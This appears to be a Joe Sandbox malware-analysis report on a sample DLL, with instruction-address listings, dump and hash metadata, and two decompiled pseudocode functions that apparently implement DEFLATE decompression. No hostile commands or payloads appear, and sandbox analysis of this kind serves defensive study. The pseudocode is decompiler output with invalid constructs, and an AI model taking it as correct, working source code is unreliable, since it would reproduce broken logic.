0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc51f5ba68a1a74f8eb5349b2f75392b11daf49af87658ea6b800e65e9ea97f
Instruction ID: a0d799e47c222190f2c1da0fd993d500abe174937b66dd2ee7bdd4d26935c3dc
Opcode Fuzzy Hash: 0dc51f5ba68a1a74f8eb5349b2f75392b11daf49af87658ea6b800e65e9ea97f
Instruction Fuzzy Hash: E4F1F772B0C3C58BE7A48F19E4407AAB7E6F784754F148236DA9947BE8D63DD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F7FA Relevance: .4, Instructions: 381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF305F7FA(unsigned long long _a48, signed char _a56, unsigned int _a80, intOrPtr _a88, long long _a112, unsigned int _a256, void* _a304, void* _a416, signed int _a440) {
				unsigned int _t37;
				unsigned int _t48;
				signed char _t52;
				signed char _t53;
				unsigned long long _t83;
				signed long long _t98;
				long long _t101;
				void* _t102;
				intOrPtr _t103;
				signed char* _t105;
				signed char* _t108;
				void* _t110;

				_a112 = _t101;
				_t29 = _a440;
				_t48 =  *(_t102 + 0xc);
				r8d = _t48;
				r8d = r8d << 8;
				r10d = _t48;
				r10d = r10d & 0x0000000f;
				r11b = _a256 >> ((_t48 >> 0x00000004) + 0x00000008 & 0x0000003f) == 0;
				r11b = r11b & (_a440 & 0xffffff00 | (_t29 & 0x00000004) == 0x00000000);
				r12d = _a80;
				if (_t105 == _t110) goto 0xf305f8b8;
				r9d =  *_t105 & 0x000000ff;
				_t35 =  !=  ? 0x1c01 : 0x301;
				r12d = 0x1c01;
				if (r11b != 0) goto 0xf305f89e;
				r12d =  !=  ? 0x1c01 : 0x301;
				 *(_a88 + 0x10) = r9d;
				r12d =  >=  ? 0x1c01 : r12d;
				if (r12b == 0) goto 0xf305f83f;
				_t37 = r12b & 0xffffffff;
				if (_t37 != 1) goto 0xf3060ba4;
				r12d = r12d >> 8;
				_t108 =  &(_t105[1]);
				_t103 = _a88;
				_t52 = _a56;
				if (_t52 - 3 >= 0) goto 0xf305f93d;
				if (_t108 == _t110) goto 0xf305f92c;
				_t83 = _a48 | _t98 << _t52;
				_a48 = _t83;
				_t53 = _t52 + 8;
				_a56 = _t53;
				r12d = 0;
				goto 0xf305f932;
				r12d = _a80;
				if ((r12b & 0x00000002) == 0) goto 0xf305f902;
				goto 0xf305fa58;
				_a48 = _t83 >> 3;
				_a56 = _t53 + 0xfffffffd;
				 *(_t103 + 0x18) = _t37 & 0x00000001;
				 *(_t103 + 0x1c) = _t37 >> 0x00000001 & 0x00000003;
				goto __rax;
			}

0x7fef305f7fa
0x7fef305f7ff
0x7fef305f80b
0x7fef305f80f
0x7fef305f812
0x7fef305f816
0x7fef305f82d
0x7fef305f834
0x7fef305f838
0x7fef305f842
0x7fef305f848
0x7fef305f850
0x7fef305f88e
0x7fef305f893
0x7fef305f899
0x7fef305f89b
0x7fef305f8a9
0x7fef305f8ad
0x7fef305f8be
0x7fef305f8c4
0x7fef305f8d3
0x7fef305f8d9
0x7fef305f8dd
0x7fef305f8e0
0x7fef305f8f6
0x7fef305f905
0x7fef305f90a
0x7fef305f915
0x7fef305f918
0x7fef305f91d
0x7fef305f920
0x7fef305f924
0x7fef305f92a
0x7fef305f92f
0x7fef305f936
0x7fef305f938
0x7fef305f944
0x7fef305f94c
0x7fef305f955
0x7fef305f95e
0x7fef305f979

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86c7e000dd830c8504a00a81beddf06842fc1805d6e40cc2f3c2fbbb804cf1e
Instruction ID: b3567a10a6a6f7bdd6bf9ae266992a77039d53f0fccf00247865a7d53bde009c
Opcode Fuzzy Hash: d86c7e000dd830c8504a00a81beddf06842fc1805d6e40cc2f3c2fbbb804cf1e
Instruction Fuzzy Hash: 85F10633B083D58BE7A48F29E4407AAB7E1F788794F148236DA9957B98D67CD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FBFD Relevance: .4, Instructions: 379
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E000007FE7FEF305FBFD(signed int __esi, signed int __ebp, signed int __rdx, signed int __rdi, signed long long __r8, signed int __r9, void* __r10, void* __r12, long long __r13, signed char* __r14, signed int __r15) {
				signed int _t473;
				signed int _t478;
				signed int _t482;
				signed char _t483;
				signed char _t484;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed char _t489;
				signed char _t496;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				unsigned int _t515;
				signed int _t516;
				short _t518;
				signed int _t532;
				signed short _t534;
				signed int _t535;
				signed int _t537;
				signed int _t545;
				signed short _t547;
				signed char _t556;
				signed int _t562;
				signed int _t565;
				unsigned int _t569;
				signed int _t598;
				signed char _t599;
				signed int _t603;
				signed char _t604;
				signed int _t613;
				signed char _t620;
				signed char _t624;
				signed char _t625;
				signed char _t628;
				unsigned int _t647;
				signed int _t648;
				short _t650;
				signed char _t665;
				signed char _t667;
				signed int _t671;
				signed int _t672;
				signed char _t674;
				signed char _t680;
				signed int _t684;
				signed char _t688;
				signed int _t691;
				signed char _t710;
				unsigned int _t717;
				signed char _t719;
				signed int _t729;
				signed int _t738;
				signed int _t751;
				signed int _t752;
				signed int _t763;
				signed short _t765;
				signed int _t767;
				signed short _t770;
				signed int _t775;
				signed int _t776;
				signed short _t779;
				void* _t783;
				signed int _t786;
				signed int _t792;
				signed int _t799;
				signed int _t802;
				signed int _t805;
				signed char _t807;
				signed int _t829;
				signed int _t831;
				signed int _t855;
				signed int _t858;
				void* _t859;
				void* _t870;
				signed short _t881;
				void* _t886;
				void* _t889;
				void* _t912;
				signed int _t922;
				void* _t924;
				void* _t953;
				short _t961;
				void* _t966;
				signed int _t994;
				signed int _t995;
				void* _t999;
				void* _t1002;
				void* _t1004;
				signed int _t1012;
				void* _t1018;
				signed long long _t1021;
				signed long long _t1025;
				signed long long _t1026;
				signed long long _t1032;
				signed long long _t1033;
				long long _t1049;
				signed int _t1058;
				signed long long _t1059;
				signed long long _t1060;
				signed long long _t1064;
				signed long long _t1065;
				signed long long _t1066;
				signed long long _t1067;
				signed long long _t1068;
				signed long long _t1069;
				signed long long _t1070;
				signed long long _t1072;
				void* _t1073;
				long long* _t1080;
				unsigned long long _t1083;
				unsigned long long _t1087;
				void* _t1091;
				long long _t1092;
				signed long long _t1094;
				signed long long _t1098;
				signed long long _t1099;
				signed long long _t1110;
				signed long long _t1114;
				intOrPtr _t1122;
				void* _t1124;
				long long _t1127;
				signed long long _t1128;
				intOrPtr _t1129;
				signed long long _t1131;
				signed char* _t1140;
				signed long long _t1143;
				unsigned long long _t1147;
				signed long long _t1151;
				unsigned long long _t1152;
				signed long long _t1160;
				unsigned long long _t1163;
				unsigned long long _t1164;
				intOrPtr _t1173;
				signed long long _t1178;
				unsigned long long _t1180;
				signed long long _t1187;
				signed long long _t1188;
				signed long long _t1192;
				signed long long _t1196;
				intOrPtr _t1198;
				void* _t1200;
				signed long long _t1209;
				signed long long _t1215;
				long long _t1216;
				void* _t1217;
				signed long long _t1220;
				signed char* _t1225;
				signed char* _t1234;
				signed long long _t1237;
				signed long long _t1238;
				signed long long _t1239;
				signed long long _t1241;
				void* _t1246;
				signed long long _t1257;
				void* _t1259;
				signed long long _t1262;
				void* _t1263;
				void* _t1264;
				long long _t1265;
				void* _t1269;
				intOrPtr _t1272;
				void* _t1274;
				intOrPtr _t1281;
				intOrPtr _t1284;
				long long _t1287;
				signed char* _t1290;
				intOrPtr _t1293;
				intOrPtr _t1294;
				intOrPtr _t1295;
				intOrPtr _t1296;
				intOrPtr _t1298;
				signed long long _t1299;
				intOrPtr _t1301;
				long long _t1304;
				signed char* _t1307;
				long long _t1315;
				signed char* _t1318;
				signed char* _t1322;
				signed char* _t1323;
				signed char* _t1324;
				signed char* _t1325;
				void* _t1329;
				void* _t1332;
				void* _t1333;
				void* _t1337;
				void* _t1338;
				signed int* _t1339;
				signed long long _t1345;

				 *((long long*)(_t1259 + 0x70)) = __r8;
				_t620 =  *(_t1259 + 0x38);
				r8d =  *(_t1259 + 0x40);
				_t859 = r8d - 3;
				if (_t859 >= 0) goto 0xf30605ce;
				 *(_t1259 + 0x80) = 0x5;
				 *(_t1259 + 0x88) = 4;
				r9d = r8d;
				_t473 =  *(_t1259 + 0x80 + __r9 * 4);
				if (_t859 >= 0) goto 0xf305fc89;
				if (__r14 == __r15) goto 0xf305fc7b;
				_t599 =  *__r14 & 0x000000ff;
				_t1083 =  *(_t1259 + 0x30) << _t620 |  *(_t1259 + 0x30);
				 *(_t1259 + 0x30) = _t1083;
				 *(_t1259 + 0x38) = _t620 + 8;
				r12d = 0;
				_t1322 =  &(__r14[1]);
				goto 0xf305fc81;
				r12d =  *(_t1259 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fc4c;
				goto 0xf305fcc8;
				 *(_t1259 + 0x30) = _t1083 >> _t473;
				 *(_t1259 + 0x38) = _t620 - _t473;
				 *((intOrPtr*)(__r10 + 0x30 + __r9 * 4)) = ( *(0xf311f0f8 + __r9 * 2) & 0x0000ffff) + (__esi &  !__ebp);
				r8d = r8d + 1;
				 *(_t1259 + 0x40) = r8d;
				r12d = 0;
				if (r12b == 0) goto 0xf305fc10;
				r12d = r12d >> 8;
				if ((r12b & 0xffffffff) == 1) goto 0xf30605fb;
				if ( *(_t1259 + 0x40) -  *(__r10 + 0x38) >= 0) goto 0xf305fd3a;
				_t624 =  *(_t1259 + 0x38);
				_t1234 = _t1322;
				if (_t624 - 3 >= 0) goto 0xf305fd6b;
				if (_t1234 == __r15) goto 0xf305fd2c;
				_t1087 =  *(_t1259 + 0x30) | __rdx << _t624;
				 *(_t1259 + 0x30) = _t1087;
				_t625 = _t624 + 8;
				 *(_t1259 + 0x38) = _t625;
				r12d = 0;
				_t1323 =  &(_t1234[1]);
				goto 0xf305fd32;
				r12d =  *(_t1259 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(__r10 + 0x38) = 0x13;
				_t1215 = __r8;
				_t478 = E000007FE7FEF3061920(0xf311f0f8, __r10, _t1259 + 0x30, __r8, __r10);
				_t1262 = _t1215;
				_t1301 =  *((intOrPtr*)(_t1259 + 0x1a0));
				_t1293 =  *((intOrPtr*)(_t1259 + 0x58));
				r12d = _t478;
				goto 0xf305fda6;
				 *(_t1259 + 0x30) = _t1087 >> 3;
				 *(_t1259 + 0x38) = _t625 + 0xfffffffd;
				if (_t478 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1293 + 0x7fef31212c4) = _t599 & 0x00000007;
				 *(_t1259 + 0x40) = _t478 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t870 = (r12b & 0xffffffff) - 1;
				if (_t870 == 0) goto 0xf30606d0;
				_t628 =  *(_t1259 + 0x38);
				_t1140 = _t1323;
				if (_t870 >= 0) goto 0xf30604e6;
				if (_t1140 == __r15) goto 0xf305fe03;
				_t1237 = __r15 << _t628;
				 *(_t1259 + 0x30) =  *(_t1259 + 0x30) | _t1237;
				 *(_t1259 + 0x38) = _t628 + 8;
				_t1324 =  &(_t1140[1]);
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1143 =  *((intOrPtr*)(_t1259 + 0x1a8));
				_t1110 = __r15 - _t1324;
				if (_t1110 - 4 < 0) goto 0xf306060d;
				_t1018 = _t1143 - _t1262;
				if (_t1018 - 2 < 0) goto 0xf306060d;
				if (_t1018 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1110 - 0xd > 0) goto 0xf3060750;
				_t482 =  *(_t1259 + 0x38);
				if (_t1018 - 0x1e >= 0) goto 0xf305fe76;
				_t1325 =  &(_t1324[4]);
				 *(_t1259 + 0x30) = _t1143 << _t482 |  *(_t1259 + 0x30);
				_t483 = _t482 + 0x20;
				 *(_t1259 + 0x38) = _t483;
				goto 0xf305fe7b;
				_t763 =  *((short*)(_t1293 + 0x3c + _t1110 * 2));
				if (_t763 < 0) goto 0xf305fea3;
				if ((_t763 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t763 - 0x23f > 0) goto 0xf30611c7;
				_t765 =  *((short*)(_t1293 + 0x83c + __rdi * 2));
				_t881 = _t765;
				if (_t881 < 0) goto 0xf305fea8;
				 *(_t1259 + 0x40) = _t765 & 0x0000ffff;
				_t1147 =  *(_t1259 + 0x30) >> 0xb;
				 *(_t1259 + 0x30) = _t1147;
				_t484 = _t483 - 0xb;
				 *(_t1259 + 0x38) = _t484;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t881 < 0) goto 0xf305f43b;
				_t792 =  *((short*)(_t1293 + 0x3c + _t1110 * 2));
				if (_t792 < 0) goto 0xf305ff16;
				if ((_t792 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t792 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1293 + 0x83c + _t1215 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1259 + 0x30) = _t1147 >> 0xb;
				 *(_t1259 + 0x38) = _t484 - 0xb;
				_t886 = _t1262 -  *((intOrPtr*)(_t1259 + 0x1a8));
				if (_t886 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1301 + _t1262)) = dil;
				asm("bt esi, 0x8");
				if (_t886 < 0) goto 0xf3060a8e;
				if (_t1262 + 1 -  *((intOrPtr*)(_t1259 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1301 + _t1262 + 1)) = sil;
				_t1263 = _t1262 + 2;
				_t486 =  *(_t1259 + 0x40);
				r12b = 0x15;
				if (_t486 - 0xff > 0) goto 0xf305f43b;
				_t889 = _t1263 -  *((intOrPtr*)(_t1259 + 0x1a8));
				if (_t889 == 0) goto 0xf3061262;
				if (_t889 >= 0) goto 0xf3061284;
				 *(_t1301 + _t1263) = _t486;
				_t1264 = _t1263 + 1;
				r12b = 0xc;
				_t487 =  *(_t1259 + 0x38);
				if (_t487 - 0xe > 0) goto 0xf30600a1;
				_t1114 = __r15 - _t1325;
				if (_t1114 - 1 > 0) goto 0xf3060085;
				_t647 =  *((short*)(_t1293 + 0xddc + _t1114 * 2));
				if (_t647 < 0) goto 0xf3060019;
				if ((_t647 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t648 = _t647 >> 9;
				if (_t487 - _t648 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t487 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t648 - 0x23f > 0) goto 0xf30611b9;
				_t650 =  *((short*)(_t1293 + 0x15dc + _t1114 * 2));
				if (_t650 >= 0) goto 0xf3060051;
				if (_t487 - 0xc >= 0) goto 0xf3060023;
				if (_t650 >= 0) goto 0xf30600a1;
				if (_t1325 == __r15) goto 0xf3060156;
				_t1238 = _t1237 << _t487;
				_t1151 =  *(_t1259 + 0x30) | _t1238;
				 *(_t1259 + 0x30) = _t1151;
				_t488 = _t487 + 8;
				 *(_t1259 + 0x38) = _t488;
				if (_t488 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1239 = _t1238 << _t488;
				_t1152 = _t1151 | _t1239;
				 *(_t1259 + 0x30) = _t1152;
				_t489 = _t488 + 0x10;
				 *(_t1259 + 0x38) = _t489;
				_t767 =  *((short*)(_t1293 + 0xddc + _t1114 * 2));
				if (_t767 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t767 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t770 =  *((short*)(_t1293 + 0x15dc + __rdi * 2));
				if (_t770 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1259 + 0x30) = _t1152 >> 0xb;
				 *(_t1259 + 0x38) = _t489 - 0xb;
				if ((_t770 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1259 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1259 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t663 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t908 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1259 + 0x7c);
				goto 0xf3060149;
				_t665 =  *(_t1259 + 0x38);
				_t603 =  *(_t1259 + 0x50);
				if (_t665 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1259 + 0x30) =  *(_t1259 + 0x30) | _t1239 << _t665;
				 *(_t1259 + 0x38) = _t665 + 8;
				_t1329 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t1021 =  *((intOrPtr*)(_t1259 + 0x1a8));
				_t912 = _t1264 - _t1021;
				if (_t912 == 0) goto 0xf3061238;
				if (_t912 >= 0) goto 0xf3061284;
				 *((char*)(_t1301 + _t1264)) =  *(_t1259 + 0x3c);
				_t1265 = _t1264 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1259 + 0x40) =  *(_t1259 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1259 + 0x70)) = __r13;
				r13d =  *(_t1259 + 0x3c);
				_t1241 =  *((intOrPtr*)(_t1259 + 0x1a8));
				if (_t1265 == _t1241) goto 0xf3060b97;
				_t1091 = _t1241 - _t1265;
				_t1216 = _t1265;
				_t1092 =  >=  ? _t1021 : _t1091;
				 *((long long*)(_t1259 + 0x28)) =  *(_t1259 + 0xb8);
				 *((long long*)(_t1259 + 0x20)) = _t1092;
				_t1287 = _t1216;
				E000007FE7FEF30616A0();
				_t1294 =  *((intOrPtr*)(_t1259 + 0x58));
				_t1269 = _t1216 + _t1092;
				r12b = 0xc;
				 *(_t1259 + 0x40) =  *(_t1259 + 0x40) - _t603;
				if (_t1091 != _t1021) goto 0xf3060208;
				_t1315 =  *((intOrPtr*)(_t1259 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1294 + 0x18)) == 0) goto 0xf305f43b;
				_t667 =  *(_t1259 + 0x38);
				_t1198 =  *((intOrPtr*)(_t1259 + 0xe0));
				_t829 =  >=  ? r14d : _t667 >> 3;
				_t604 = _t1241 * 8;
				_t496 = (_t667 & 0xfffffff8) - _t604;
				 *(_t1259 + 0x38) = _t496;
				_t1332 = _t1329 - __r15 + _t1198 - _t1241;
				if (_t1332 - _t1198 > 0) goto 0xf30613c7;
				_t1333 = _t1332 + _t1315;
				 *(_t1259 + 0x30) =  !(0xffffffff << (_t496 & 0x00000038)) &  *(_t1259 + 0x30) >> (_t667 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1259 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1259 + 0x40) = 0;
				r12b = 0x17;
				_t671 =  *(_t1259 + 0x40) & 0x000001ff;
				 *(_t1259 + 0x40) = _t671;
				r12b = 0x14;
				if (_t671 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t671 - 0x11d > 0) goto 0xf305f43b;
				_t672 =  *(_t1021 + 0xf311eee8) & 0x000000ff;
				_t922 = _t672;
				r12b = _t922 == 0;
				 *(_t1259 + 0x44) = _t672;
				 *(_t1259 + 0x40) =  *(0xf311ef08 + _t1021 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1259 + 0x3c);
